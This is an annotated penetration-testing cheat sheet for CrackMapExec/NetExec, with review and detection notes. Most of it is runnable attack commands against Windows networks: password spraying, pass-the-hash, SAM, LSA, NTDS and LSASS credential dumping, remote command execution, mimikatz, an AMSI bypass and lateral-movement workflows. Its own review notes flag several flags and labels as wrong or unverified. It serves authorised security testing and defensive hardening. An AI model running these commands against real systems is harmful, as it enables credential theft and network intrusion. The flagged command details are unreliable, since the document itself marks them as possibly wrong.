
CrackMapExec (NetExec)

Swiss army knife for pentesting networks. CrackMapExec has been forked to NetExec, but both are widely used.

Installation

# Install CrackMapExec.
# Supply-chain note: this is an unpinned install from PyPI of a tool that will later
# hold harvested credentials; pin a version or install from a reviewed checkout into
# a dedicated venv/pipx environment.
pip install crackmapexec

# Or NetExec (newer fork). NetExec installs the `nxc` / `netexec` entry points rather
# than `crackmapexec`, so substitute one of those in every command below.
# NOTE(review): upstream NetExec documents installation from its GitHub repository
# (Pennyw0rth/NetExec); verify the PyPI package name before relying on it.
pip install netexec

# From source (original CrackMapExec repository; per the note above, NetExec is the
# maintained continuation)
git clone https://github.com/Porchetta-Industries/CrackMapExec
cd CrackMapExec
pip install .

Basic Usage

Protocols

# Each protocol is a sub-command. `target` is a placeholder for an IP, hostname,
# CIDR range or a file of targets (see Host Discovery below).
# NOTE(review): in CME, global options such as --verbose are parsed before the
# protocol name — confirm with --help.

# SMB
crackmapexec smb target

# WinRM
crackmapexec winrm target

# LDAP
crackmapexec ldap target

# MSSQL
crackmapexec mssql target

# RDP
crackmapexec rdp target

# SSH
crackmapexec ssh target

# FTP
crackmapexec ftp target

SMB Enumeration

Host Discovery

# Single host (banner line shows hostname, domain, OS and whether SMB signing is required)
crackmapexec smb 192.168.1.10

# Subnet scan (CIDR notation)
crackmapexec smb 192.168.1.0/24

# Multiple hosts from file (one target per line)
crackmapexec smb targets.txt

# Write the hosts whose SMB signing is NOT required to relay_targets.txt.
# (The original label "Show SMB version" was wrong: --gen-relay-list is the signing
# check; the SMB/OS info is already in the default banner output.)
# Hardening view: every host that lands in this file should have SMB signing enforced.
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Authentication

# With credentials.
# Passwords given on argv end up in shell history and are visible to other users via
# `ps`; on shared hosts prefer a password file (-p passwords.txt, as further below).
crackmapexec smb 192.168.1.10 -u administrator -p Password123

# With hash (Pass-the-Hash). NTHASH is a placeholder for the NT hash;
# LMHASH:NTHASH is also accepted.
crackmapexec smb 192.168.1.10 -u administrator -H NTHASH

# Null session (anonymous bind). A success here is a finding on its own.
crackmapexec smb 192.168.1.10 -u '' -p ''

# Guest account (should be disabled on a hardened host)
crackmapexec smb 192.168.1.10 -u 'guest' -p ''

# Multiple users and passwords (-u/-p accept file paths; every user/password
# combination is tried, and each attempt counts towards the account lockout threshold)
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt

# Continue on success (don't stop at first match)
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt --continue-on-success

# Local authentication (authenticate as a local SAM account rather than a domain account)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --local-auth

Share Enumeration

# List shares together with this account's READ/WRITE permissions on each
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares

# Access specific share
# NOTE(review): --shares takes no argument in CME; a trailing SHARENAME is probably
# parsed as a second target. Check whether your version supports a share filter.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares SHARENAME

# List share contents (spider_plus walks the readable shares and reports the file tree)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares -M spider_plus

# Readable shares only (filters the permissions column of --shares)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares | grep READ

# Download the spidered files (DOWNLOAD_FLAG). No pattern is given here — see the
# PATTERN option under Spider Plus. Pulling whole shares is slow, noisy and collects
# data the engagement may not authorise you to hold, so scope it deliberately.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o DOWNLOAD_FLAG=True

User Enumeration

# Enumerate domain users (most complete when the target is a domain controller)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --users

# Enumerate domain groups
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --groups

# Enumerate local users
# NOTE(review): confirm --local-users exists in your version; --local-groups is the
# local-scope option documented for CME.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --local-users

# Active SMB sessions on the host
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --sessions

# Logged on users. Equally useful to a defender: privileged accounts logged on to
# ordinary workstations are the credential-exposure hotspots to eliminate.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --loggedon-users

# RID cycling (enumerates accounts by walking SID/RID values). If this also works
# with the null session shown under Authentication, anonymous enumeration is
# allowed on the host and should be restricted.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --rid-brute

Password Spraying

# Single password across many users (one attempt per account — the spraying pattern)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123'

# Continue after a valid credential is found.
# (The original label "Avoid lockouts with delay" was wrong: --continue-on-success
# adds no delay at all. Lockout risk is governed by the domain's password policy —
# read it first with --pass-pol and keep attempts per account well below the
# threshold; locking out real users is a denial of service, not a finding.)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' --continue-on-success

# Several passwords per user (each one counts towards the lockout threshold)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' 'Summer2024!' 'Welcome123'

# Output to file (tee keeps the terminal output and writes a copy)
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --continue-on-success | tee spray_results.txt

Credential Dumping

SAM Database

# Dump SAM (local account hashes; requires local admin on the target).
# Detection note: remote SAM/LSA dumping goes through the Remote Registry service,
# which the underlying secretsdump logic starts if it is stopped — an unexpected
# start of that service on a workstation is worth alerting on.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --sam

# Dump SAM with hash (NTHASH placeholder, see Authentication)
crackmapexec smb 192.168.1.10 -u administrator -H NTHASH --sam

LSA Secrets and NTDS

# Dump LSA secrets (service-account and cached credentials; local admin required)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --lsa

# Dump NTDS (Domain Controller only). The default method is drsuapi, i.e. a
# directory-replication request (DCSync-style); replication requests coming from
# anything that is not a DC should be alerted on.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --ntds

# Dump NTDS with the VSS method (copies the database via a volume shadow copy
# instead of replication; leaves more on-host artefacts on the DC)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --ntds vss

# Dump a specific user from NTDS
# NOTE(review): confirm that --user is accepted alongside --ntds in your version.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --ntds --user administrator

LSASS Dump

# Dump LSASS memory (lsassy module: dumps and parses the process remotely).
# LSASS access is among the most-monitored actions on a Windows host; Credential
# Guard / LSA protection (RunAsPPL) limit what is recoverable and are the
# mitigations to recommend.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M lsassy

# Procdump method (uploads the Sysinternals procdump binary to the target to
# create the dump — a file-drop artefact the lsassy route may avoid)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M procdump

Command Execution

Execute Commands

# Execute command via SMB (cmd.exe on the target; local admin required; the
# default execution method is wmiexec, see Execution Methods)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -x "whoami"

# PowerShell command (-X runs through powershell.exe; the single quotes stop the
# local shell from expanding $PSVersionTable before it is sent)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -X '$PSVersionTable'

# Execute on multiple hosts (runs on every host where the account is admin)
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 -x "hostname"

# smbexec execution method.
# (The original label "No output" was wrong: smbexec still retrieves output; the
# flag that skips output retrieval is --no-output.)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method smbexec -x "whoami"

Execution Methods

# Default (wmiexec: command runs through WMI)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -x "whoami"

# WMIEXEC, stated explicitly
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method wmiexec -x "whoami"

# SMBEXEC (runs the command through a temporary service on the target). It does
# return output; the "no output" label belongs to the --no-output flag.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method smbexec -x "whoami"

# ATEXEC (scheduled task)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method atexec -x "whoami"

# MMC20 (via DCOM)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method mmcexec -x "whoami"

# Detection note: each method leaves a distinct host-side artefact — process
# creation under the WMI provider host for wmiexec, service-installation events for
# smbexec, scheduled-task events for atexec, DCOM activation for mmcexec. A
# detection engineer should have coverage for all four, not just the default.

Modules

List Modules

# List all modules available for the smb protocol
crackmapexec smb -L

# Module info (MODULE_NAME is a placeholder)
# NOTE(review): CME shows a module's options with `-M MODULE_NAME --options`;
# confirm that --module-info exists in your version.
crackmapexec smb -M MODULE_NAME --module-info

Common Modules

# enum_avproducts: list the AV/EDR products registered on the host
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M enum_avproducts

# Mimikatz (runs on the target; expect AMSI/EDR to react — and if they do not,
# that absence is the finding)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M mimikatz

# UAC check (reports the host's UAC configuration)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M uac

# WiFi passwords (saved WLAN profiles on the host)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M wifi

# Chrome credential-store enumeration
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M enum_chrome

# Check for MS17-010 (unauthenticated check; a hit means the patch is missing)
crackmapexec smb 192.168.1.0/24 -M ms17_010

# PetitPotam (authentication-coercion check; mitigations are the vendor patch plus
# signing/EPA on the services a coerced authentication could be relayed to)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M petitpotam

# noPac
# NOTE(review): the nopac check needs domain credentials; as written (no -u/-p) it
# will most likely fail. A positive result means the DC is unpatched.
crackmapexec smb 192.168.1.10 -M nopac

# zerologon (unauthenticated check against a DC; the CME module only tests for the
# flaw, it does not reset the machine-account password)
crackmapexec smb 192.168.1.10 -M zerologon

Spider Plus

# Spider shares (without DOWNLOAD_FLAG this is a listing run; no files are fetched)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus

# Download files (written to the module's local output folder; handle and purge
# the copies according to the engagement's data-handling rules)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o DOWNLOAD_FLAG=True

# Specific share (C$ is the administrative share — admin rights required, and it
# is the whole system drive, so expect a very long run)
# NOTE(review): verify the SHARE and PATTERN option names with
# `-M spider_plus --options`; CME's built-in spider uses `--spider SHARE --pattern ...`.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o SHARE=C$

# File patterns (comma-separated extension list)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o PATTERN=.doc,.xls,.pdf

WinRM

# Test WinRM access. A successful login means the account has remote shell rights on
# the host; WinRM should be limited to admin/jump-host accounts and networks.
crackmapexec winrm 192.168.1.10 -u administrator -p Password123

# Execute command (runs in a remote PowerShell session)
crackmapexec winrm 192.168.1.10 -u administrator -p Password123 -x "whoami"

# With hash (NTHASH placeholder)
crackmapexec winrm 192.168.1.10 -u administrator -H NTHASH

LDAP

# LDAP authentication (bind test against the directory)
crackmapexec ldap 192.168.1.10 -u administrator -p Password123

# Enumerate users
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 --users

# Enumerate groups
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 --groups

# Dump user description attributes.
# (The original label "Get domain SID" was wrong: get-desc-users reads the
# description field — a place where passwords are too often left behind and
# should be cleaned up; the domain SID itself comes from --get-sid.)
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M get-desc-users

# ASREPRoast
# NOTE(review): in CME these are ldap flags (--asreproast OUTFILE and
# --kerberoasting OUTFILE), not modules — verify the -M form in -L before relying
# on it. Defensively: the exposed accounts are those with Kerberos pre-auth disabled
# or an SPN and a weak password; fix the setting or the password.
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M asreproast

# Kerberoast (same note as above)
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M kerberoast

# Get DNS records
# NOTE(review): labelled as DNS but runs the adcs module (duplicated just below);
# CME's DNS-zone module is get-network — verify in -L.
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M adcs

# Enumerate ADCS (certificate authorities and templates; the starting point of a
# certificate-template misconfiguration review)
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M adcs

MSSQL

# Test MSSQL access (sa is the built-in sysadmin login; it should be disabled or
# renamed and protected by a strong password)
crackmapexec mssql 192.168.1.10 -u sa -p Password123

# Enumerate databases (ad-hoc T-SQL via --query)
crackmapexec mssql 192.168.1.10 -u sa -p Password123 --query "SELECT name FROM master.dbo.sysdatabases"

# Execute command via xp_cmdshell (sysadmin role required).
# NOTE(review): presumably the tool enables xp_cmdshell when it is disabled — confirm;
# either way, xp_cmdshell being enabled on a server is itself worth auditing.
crackmapexec mssql 192.168.1.10 -u sa -p Password123 -x "whoami"

# With Windows (domain) authentication; -d names the domain of the account
crackmapexec mssql 192.168.1.10 -u administrator -p Password123 -d domain.local

Database

Credential Storage

# View database
# NOTE(review): --help prints CLI usage only. The stored hosts/credentials are
# browsed with the cmedb tool (nxcdb for NetExec).
crackmapexec smb --help

# Database location (a path, not a command). This SQLite file holds every credential
# and hash collected, unencrypted — keep the tester's disk encrypted, restrict access
# to it, and purge it when the engagement ends.
~/.cme/workspaces/default/smb.db

# Query database directly
sqlite3 ~/.cme/workspaces/default/smb.db "SELECT * FROM hosts"

# Clear database
# NOTE(review): --clear-obfuscate does not match a flag I can confirm; CME's
# --clear-obfscripts clears cached obfuscated PowerShell scripts, and the database
# itself is managed via cmedb or by removing the .db file. The label is wrong either way.
crackmapexec smb --clear-obfuscate

Workspaces

# Create workspace
# NOTE(review): --workspace is not a flag I can confirm on the protocol commands;
# in CME workspaces are created and selected with cmedb (`workspace create NAME`) — verify.
crackmapexec smb 192.168.1.10 -u admin -p pass --workspace pentesting

# List workspaces (one directory per workspace)
ls ~/.cme/workspaces/

Obfuscation

# --obfs obfuscates the PowerShell scripts the tool sends.
# NOTE(review): with a plain -x cmd.exe command it probably has no effect — verify.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -x "whoami" --obfs

# AMSI bypass (/path/to/bypass.ps1 is a placeholder for a script you supply).
# Both options exist to get past AMSI and script-block logging; on the defensive
# side those two telemetry sources, forwarded and monitored, are what should catch this.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -X '$PSVersionTable' --amsi-bypass /path/to/bypass.ps1

Output Options

# Verbose
# NOTE(review): CME's global option is --verbose and is parsed before the protocol
# name; check that -v in this position is accepted by your version.
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -v

# Save output (tee keeps the terminal output and writes a copy)
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 --users | tee users.txt

# NOTE(review): labelled "JSON output", but --jitter 1 adds a random delay between
# connections and has nothing to do with output format. Structured results live in
# the SQLite database (see the Database section).
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --users --jitter 1

Common Workflows

Domain Enumeration Workflow

# 1. Discover hosts (banner: hostname, domain, OS, SMB signing)
crackmapexec smb 192.168.1.0/24

# 2. Test credentials (valid login on each host)
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123

# 3. Check admin access (Pwn3d! = local admin on that host). Every host showing
#    Pwn3d! for the same account is within that credential's blast radius — the
#    exposure LAPS and tiered administration are meant to remove.
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 | grep Pwn3d

# 4. Enumerate shares on admin hosts
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares

# 5. Enumerate users
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --users

# 6. Dump SAM (local admin required; see the Remote Registry detection note above)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --sam

# 7. If the host is a DC (192.168.1.5 in this example), dump NTDS
crackmapexec smb 192.168.1.5 -u administrator -p Password123 --ntds

Password Spraying Workflow

# 1. Enumerate users with a low-privileged account; the redirect saves the raw tool output
crackmapexec smb 192.168.1.10 -u lowpriv -p Password123 --users > domain_users.txt

# 2. Clean user list: keep the text after the DOMAIN\ prefix up to the next space.
#    (grep can read the file itself — `grep -oP '...' domain_users.txt` — the cat is unnecessary.)
cat domain_users.txt | grep -oP '(?<=\\)[^\\]+(?= )' > users.txt

# 3. Spray common passwords (read the lockout note under Password Spraying first)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' 'Welcome2024!' --continue-on-success

Lateral Movement

# 1. Find admin access (Pwn3d!). The same local-administrator hash working across
#    many hosts means a shared local admin password — exactly what LAPS exists to fix.
crackmapexec smb 192.168.1.0/24 -u administrator -H NTHASH | grep Pwn3d

# 2. Dump credentials from accessible hosts (IP range syntax: .10 through .20)
crackmapexec smb 192.168.1.10-20 -u administrator -H NTHASH --sam --lsa

# 3. Use new creds to move further (NEWHASH placeholder)
crackmapexec smb 192.168.1.0/24 -u newuser -H NEWHASH

Quick Reference

# admin / pass / NTHASH / MODULE_NAME below are placeholders.

# Host discovery
crackmapexec smb 192.168.1.0/24

# Test credentials
crackmapexec smb 192.168.1.10 -u admin -p Password123

# Pass-the-Hash
crackmapexec smb 192.168.1.10 -u admin -H NTHASH

# Password spray (check the lockout policy first — see Password Spraying)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' --continue-on-success

# Enumerate shares
crackmapexec smb 192.168.1.10 -u admin -p pass --shares

# Enumerate users
crackmapexec smb 192.168.1.10 -u admin -p pass --users

# Dump SAM (local admin required)
crackmapexec smb 192.168.1.10 -u admin -p pass --sam

# Dump NTDS (target must be a DC)
crackmapexec smb 192.168.1.10 -u admin -p pass --ntds

# Execute command (local admin required)
crackmapexec smb 192.168.1.10 -u admin -p pass -x "whoami"

# Modules
crackmapexec smb 192.168.1.10 -u admin -p pass -M MODULE_NAME